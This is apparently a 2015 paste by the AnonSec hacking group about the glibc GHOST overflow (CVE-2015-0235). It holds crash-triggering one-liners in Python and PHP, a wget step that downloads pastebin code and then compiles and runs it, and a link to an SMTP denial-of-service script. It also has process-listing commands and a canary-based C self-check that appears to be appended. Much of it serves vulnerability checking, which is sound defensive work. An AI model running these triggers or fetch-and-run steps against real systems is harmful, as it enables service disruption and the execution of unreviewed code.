_d3f4ult

[+] Ghost: CVE-2015-0235 [+]

Jan 30th, 2015
We are...
[AnonSec ASCII-art banner]
//Laughing at your security since 2012*
=================================================================================================
Official Members: Mrlele - AnonSec666 - 3r3b0s - d3f4ult - PhantomGhost - Hannaichi - ap3x h4x0r
- Gh05tFr3ak - spider64 - OverKiller - Cyb3r Shzz0r - Pr3d4T0r - Mr. BlackList
- Razar - MR.WWW - AN0NT0XIC
=================================================================================================

[+] Check if vuln to Ghost: glibc gethostbyname() buffer overflow via Python, PHP, C and Shell [+]

[+] Python [+]
python -c "import socket; socket.gethostbyname('0' * $((0x10000 - 16 * 1 - 2 * 4 - 1 - 4)))"
Segmentation fault
echo $?
# 139 = killed by SIGSEGV, i.e. the unfixed gethostbyname() overflowed

[+] PHP [+]
php -r '$e="0";for($i=0;$i<2500;$i++){$e="0$e";} gethostbyname($e);'
Segmentation fault

[+] C [+]
wget http://pastebin.com/raw.php?i=7LFRPczm -O ghost.c
gcc ghost.c -o ghost
./ghost

  31.  
[+] ghost-smtp-dos.py [+]
http://pastebin.com/QmngpTdy

[+] GhostFlow.c - Ghost BufferOverflow [+]
http://pastebin.com/7LFRPczm

[+] Ghost.sh [+]
http://pastebin.com/y9xGNrBi

[+] Check your libc version [+]

ldd --version

Here is a list of potential targets that we investigated (they all call
gethostbyname, one way or another), but to the best of our knowledge,
the buffer overflow cannot be triggered in any of them:

apache, cups, dovecot, gnupg, isc-dhcp, lighttpd, mariadb/mysql,
nfs-utils, nginx, nodejs, openldap, openssh, postfix, proftpd,
pure-ftpd, rsyslog, samba, sendmail, sysklogd, syslog-ng, tcp_wrappers,
vsftpd, xinetd.

  57.  
[+] Find Processes Dependent on glibc [+]

lsof | grep libc | awk '{print $1}' | sort | uniq

lsof | awk '/libc/{print $1 | "sort -u" }'

netstat -lnp | grep -e "\(tcp.*LISTEN\|udp\)" | cut -d / -f 2- | sort -u

sudo netstat -lnp | awk -F/ '/LISTEN /{print $2}'

[+] Code Analysis [+]

gethostbyname() and friends fill in struct hostent:

struct hostent {
    char  *h_name;        /* official name of host */
    char **h_aliases;     /* alias list */
    int    h_addrtype;    /* host address type */
    int    h_length;      /* length of address */
    char **h_addr_list;   /* list of addresses */
};

The overflow sits in __nss_hostname_digits_dots(), where the buffer is grown to an undersized size_needed before the hostent is filled in (glibc source, original line numbers kept):

101   *buffer_size = size_needed;
102   new_buf = (char *) realloc (*buffer, *buffer_size);
103
104   if (new_buf == NULL)
105     {
...
114       goto done;
115     }
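A canary-based self-check in C, added here as an example (it is not the page's linked GhostFlow.c): it reuses the `16 * 1 - 2 * 4 - 1` sizing from the Python check above against a 1024-byte buffer, and inspects a canary placed right after that buffer instead of waiting for a crash. The canary string is a constructed value.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <netdb.h>
#include <stdio.h>
#include <string.h>

/* Canary placed directly after the buffer handed to gethostbyname_r().
 * Constructed value: if it changes, the lookup wrote past its buffer. */
#define CANARY "canary_after_buf"

static struct {
    char buffer[1024];
    char canary[sizeof(CANARY)];
} temp = { "buffer", CANARY };

/* Returns 1 if the canary was overwritten (unfixed glibc),
 * 0 if it is intact (fixed glibc answers ERANGE instead). */
int ghost_check(void)
{
    struct hostent resbuf;
    struct hostent *result;
    int herrno, retval;

    /* Size the all-digit name so size_needed in
     * __nss_hostname_digits_dots() exactly fills the buffer; the
     * sizeof(char *) missing from the unfixed computation then
     * spills onto the canary. */
    size_t len = sizeof(temp.buffer) - 16 * sizeof(unsigned char)
                 - 2 * sizeof(char *) - 1;
    char name[sizeof(temp.buffer)];
    memset(name, '0', len);
    name[len] = '\0';

    /* All digits parse as an IPv4 literal, so no DNS traffic is sent. */
    retval = gethostbyname_r(name, &resbuf, temp.buffer,
                             sizeof(temp.buffer), &result, &herrno);

    if (strcmp(temp.canary, CANARY) != 0)
        return 1;                        /* buffer overflowed: vulnerable */
    if (retval != ERANGE)                /* intact canary, unexpected code */
        fprintf(stderr, "unexpected return %d\n", retval);
    return 0;                            /* not vulnerable */
}

int main(void)
{
    puts(ghost_check() ? "vulnerable" : "not vulnerable");
    return 0;
}
```

On a fixed glibc the call returns ERANGE and the canary stays intact; this checks the running libc only, so long-lived services listed with lsof above still need a restart after patching.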